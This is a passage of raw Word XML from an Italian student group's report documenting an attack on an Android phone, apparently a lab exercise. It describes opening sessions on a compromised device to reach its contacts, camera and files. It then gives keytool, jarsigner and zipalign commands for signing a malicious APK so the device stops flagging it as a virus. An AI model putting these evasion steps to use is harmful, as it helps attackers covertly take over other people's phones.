          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>attive</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e tramite il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>avremmo la possibilità di vedere</w:t>
      </w:r>
      <w:r w:rsidR="00C96FDA">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tutte</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> le session</w:t>
      </w:r>
      <w:r w:rsidR="00C96FDA">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00C232A0">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569F520A" w14:textId="77777777" w:rsidR="00C232A0" w:rsidRDefault="00C232A0" w:rsidP="00261FE8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DD833E" w14:textId="6EB2A636" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F28D032" wp14:editId="2516972F">
            <wp:extent cx="4259580" cy="1280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"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="42595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0B61E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5C577982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22DD5D8D" w14:textId="5E110F04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Una volta individuata la connessione attiva</w:t>
      </w:r>
      <w:r w:rsidR="00F0093F">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>per connettersi al dispostivo basterà digirare il comando "sessions</w:t>
      </w:r>
      <w:r w:rsidR="00F4794E">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>id_sessione</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A9E3A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2C74CCCC" w14:textId="300C9B69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Dopo essersi connessi alla sessione saremo definitivamente dentro il sistema operativo del dispositivo e da qui abbiamo accesso a tutt</w:t>
      </w:r>
      <w:r w:rsidR="002C0BE1">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>e le funzionalità</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> all'interno dello smartphone</w:t>
      </w:r>
      <w:r w:rsidR="002C0BE1">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( impostazioni di rete, file system, contatti, accesso all fotocamera, ... )</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E16AA7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3DC55984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Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5707F66B" w14:textId="77777777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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D39D959" w14:textId="4B4BD73E" w:rsidR="00C232A0" w:rsidRDefault="00C232A0" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378D4342" wp14:editId="415A1DBB">
            <wp:extent cx="4061149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7"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067706" cy="341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E1FCE" w14:textId="39337835" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00261FE8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</w:p>
    <w:p w14:paraId="477ED104" w14:textId="1E877EF5" w:rsidR="00F4794E" w:rsidRDefault="00261FE8" w:rsidP="00F4794E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261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Come possiamo notare da questa immagine, tramite il comando "app_list" abbiamo la possibilità di visualizzare tutte le applicazioni installate nel dispositivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E3C51" w14:textId="55FCDBEC" w:rsidR="00F4794E" w:rsidRDefault="00F4794E" w:rsidP="00F4794E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</w:p>
    <w:p w14:paraId="49A04C6B" w14:textId="6DB950DC" w:rsidR="00F4794E" w:rsidRDefault="00F4794E" w:rsidP="00F4794E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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Prove effettuate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796005A6" w14:textId="73C5B51A" w:rsidR="00341DCB" w:rsidRDefault="00341DCB" w:rsidP="00F4794E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C193C5" w14:textId="2E0F47B4" w:rsidR="00341DCB" w:rsidRPr="00341DCB" w:rsidRDefault="00341DCB" w:rsidP="00F4794E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>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Dopo aver notato che il dispositivo rilevava che l’applicazione era un virus abbiamo deciso di implementare un certificato per l’applicazione, in modo che il dispositivo non mostrasse più l’alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602EEDED" w14:textId="036A7EBC" w:rsidR="00F4794E" w:rsidRDefault="00F4794E" w:rsidP="00F4794E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</w:p>
    <w:p w14:paraId="6ED394BD" w14:textId="77777777" w:rsidR="004048DB" w:rsidRPr="004048DB" w:rsidRDefault="004048DB" w:rsidP="004048DB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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Implementazione certificato per l’applicazione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDF8BE" w14:textId="0EDD0D31" w:rsidR="004048DB" w:rsidRPr="004048DB" w:rsidRDefault="004048DB" w:rsidP="004048DB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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>creare un file .apk malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA76DF5" w14:textId="77777777" w:rsidR="004048DB" w:rsidRDefault="004048DB" w:rsidP="004048DB">
      <w:pPr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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>dopo aver creato il file.apk bisogna registrare il certificato di validazione del file affinché i dispositivi mobile non facciano richiesta di installare da fonti sconosciute. Per realizzare ciò abbiamo bisogno di questi tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEBB304" w14:textId="00879DB1" w:rsidR="004048DB" w:rsidRPr="004048DB" w:rsidRDefault="00341DCB" w:rsidP="004048DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:num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>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="004048DB" w:rsidRPr="004048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>eytool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E747050" w14:textId="41EFEAC8" w:rsidR="004048DB" w:rsidRDefault="004048DB" w:rsidP="004048DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:num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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Jarsigner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD201FE" w14:textId="6D5E1C66" w:rsidR="004048DB" w:rsidRPr="004048DB" w:rsidRDefault="004048DB" w:rsidP="004048DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:num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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>zipalign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C17D37" w14:textId="0D47C037" w:rsidR="004048DB" w:rsidRDefault="004048DB" w:rsidP="004048DB">
      <w:pPr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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>creare le chiavi con un determinato alias e con i vari parametri di autenticazione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A5AAA4" w14:textId="77777777" w:rsidR="00341DCB" w:rsidRDefault="00341DCB" w:rsidP="00341DCB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</w:p>
    <w:p w14:paraId="5E467402" w14:textId="49D93EFE" w:rsidR="00341DCB" w:rsidRPr="00341DCB" w:rsidRDefault="004048DB" w:rsidP="00341DCB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pP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keytool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 xml:space="preserve"> -</w:t>
      </w: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genkey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 xml:space="preserve"> -V -</w:t>
      </w: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keystore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 xml:space="preserve"> </w:t>
      </w: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key.keystore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 xml:space="preserve"> -alias [</w:t>
      </w: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nomea_alias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>] -</w:t>
      </w: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storepass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 xml:space="preserve"> [</w:t>
      </w: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store_pass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 xml:space="preserve">] - </w:t>
      </w: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keypass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 xml:space="preserve"> [</w:t>
      </w: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key_pass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>] -</w:t>
      </w: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keyalg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 xml:space="preserve"> RSA -</w:t>
      </w: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keysize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 xml:space="preserve"> 2048 -validity 1000</w:t>
      </w:r>
      <w:r w:rsidR="00341DCB" w:rsidRPr="00341DCB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C339EAF" w14:textId="77777777" w:rsidR="00341DCB" w:rsidRPr="00341DCB" w:rsidRDefault="00341DCB" w:rsidP="00341DCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CD7599" w14:textId="32C1EBE8" w:rsidR="004048DB" w:rsidRDefault="004048DB" w:rsidP="004048DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Associare le chiavi al file.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483DF99" w14:textId="77777777" w:rsidR="00341DCB" w:rsidRPr="004048DB" w:rsidRDefault="00341DCB" w:rsidP="00341DCB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</w:p>
    <w:p w14:paraId="738FC77E" w14:textId="6DE5330B" w:rsidR="00341DCB" w:rsidRPr="00341DCB" w:rsidRDefault="004048DB" w:rsidP="00341DCB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pP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jarsigner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 xml:space="preserve"> -verbose -</w:t>
      </w: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sigalg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 xml:space="preserve"> SHA1withRSA -</w:t>
      </w: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digestalg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 xml:space="preserve"> SHA1 -</w:t>
      </w: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keystore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 xml:space="preserve"> </w:t>
      </w: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key.keystore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 xml:space="preserve"> </w:t>
      </w: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android_shell.apk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 xml:space="preserve"> [</w:t>
      </w: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nome_alias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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78916D2E" w14:textId="77777777" w:rsidR="00341DCB" w:rsidRPr="00EF749F" w:rsidRDefault="00341DCB" w:rsidP="00341DCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583A6537" w14:textId="0596A9E4" w:rsidR="004048DB" w:rsidRDefault="004048DB" w:rsidP="00341DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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4048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Verificare le azioni fatte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000488E" w14:textId="77777777" w:rsidR="00341DCB" w:rsidRPr="004048DB" w:rsidRDefault="00341DCB" w:rsidP="00341DCB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</w:p>
    <w:p w14:paraId="5349C43F" w14:textId="057F9149" w:rsidR="004048DB" w:rsidRPr="00341DCB" w:rsidRDefault="004048DB" w:rsidP="00341DCB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pP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jarsigner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 xml:space="preserve"> -verify -verbose -certs </w:t>
      </w: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android_shell.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C2CEF76" w14:textId="77777777" w:rsidR="00341DCB" w:rsidRPr="00EF749F" w:rsidRDefault="00341DCB" w:rsidP="00341DCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFA99D9" w14:textId="12EB781B" w:rsidR="004048DB" w:rsidRPr="004048DB" w:rsidRDefault="004048DB" w:rsidP="00341DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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  <w:r w:rsidRPr="004048DB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Installare zipalign per fare una seconda verifica del certificato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFB024" w14:textId="77777777" w:rsidR="00341DCB" w:rsidRDefault="00341DCB" w:rsidP="00341DCB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</w:p>
    <w:p w14:paraId="5BED086D" w14:textId="27041613" w:rsidR="004048DB" w:rsidRPr="00341DCB" w:rsidRDefault="004048DB" w:rsidP="00341DCB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pP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zipalign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 xml:space="preserve"> -v 4 [</w:t>
      </w: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nome_file_hack.apk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>] [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00341DCB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>singed_jar.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00341DCB">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C9969" w14:textId="77777777" w:rsidR="00F4794E" w:rsidRPr="00F4794E" w:rsidRDefault="00F4794E" w:rsidP="00F4794E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F4794E" w:rsidRPr="00F4794E" w:rsidSect="009D77D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330A8" w14:textId="77777777" w:rsidR="00BA4DBE" w:rsidRDefault="00BA4DBE" w:rsidP="00261FE8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="792D3FFC" w14:textId="77777777" w:rsidR="00BA4DBE" w:rsidRDefault="00BA4DBE" w:rsidP="0026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6750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F320E" w14:textId="54CAE67A" w:rsidR="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00EF749F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33E849" w14:textId="45C4AB5F" w:rsidR="00261FE8" w:rsidRDefault="00261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FB3BB" w14:textId="77777777" w:rsidR="00BA4DBE" w:rsidRDefault="00BA4DBE" w:rsidP="00261FE8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5C7CC82E" w14:textId="77777777" w:rsidR="00BA4DBE" w:rsidRDefault="00BA4DBE" w:rsidP="00261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F962C" w14:textId="2D092DC0" w:rsidR="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00261FE8">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
      </w:rPr>
      <w:t>Documentazione attacco hacker ad un dispositivo Android</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="542CEF72" w14:textId="2F9D49E4" w:rsidR="00EF749F" w:rsidRPr="00261FE8" w:rsidRDefault="00EF749F" w:rsidP="00261FE8">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
      </w:rPr>
      <w:t>Gruppo: Apostu, Collarini, Maraspin, Vendrame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523E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F0C2412"/>
    <w:lvl w:ilvl="0" w:tplc="0410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2D122A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC54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F4B77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F718E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B067D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BB4928E"/>
    <w:lvl w:ilvl="0" w:tplc="0410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CD401D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3BC77A4"/>
    <w:lvl w:ilvl="0" w:tplc="0410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CD863E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2216F08A"/>
    <w:lvl w:ilvl="0" w:tplc="041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7A173C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60C26B3A"/>
    <w:lvl w:ilvl="0" w:tplc="0410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2A0B4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C84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7"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="3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8"/>
    <w:rsid w:val="00261FE8"/>
    <w:rsid w:val="002C0BE1"/>
    <w:rsid w:val="00341DCB"/>
    <w:rsid w:val="004048DB"/>
    <w:rsid w:val="005B35AE"/>
    <w:rsid w:val="007A0DC1"/>
    <w:rsid w:val="008F0809"/>
    <w:rsid w:val="009D77D4"/>
    <w:rsid w:val="00BA4DBE"/>
    <w:rsid w:val="00C1630C"/>
    <w:rsid w:val="00C232A0"/>
    <w:rsid w:val="00C96FDA"/>
    <w:rsid w:val="00E10CD9"/>
    <w:rsid w:val="00EF749F"/>
    <w:rsid w:val="00F0093F"/>
    <w:rsid w:val="00F4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D9F7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{59C70DF3-A0A3-42EA-8124-F310CAF0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261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FE8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00261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FE8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
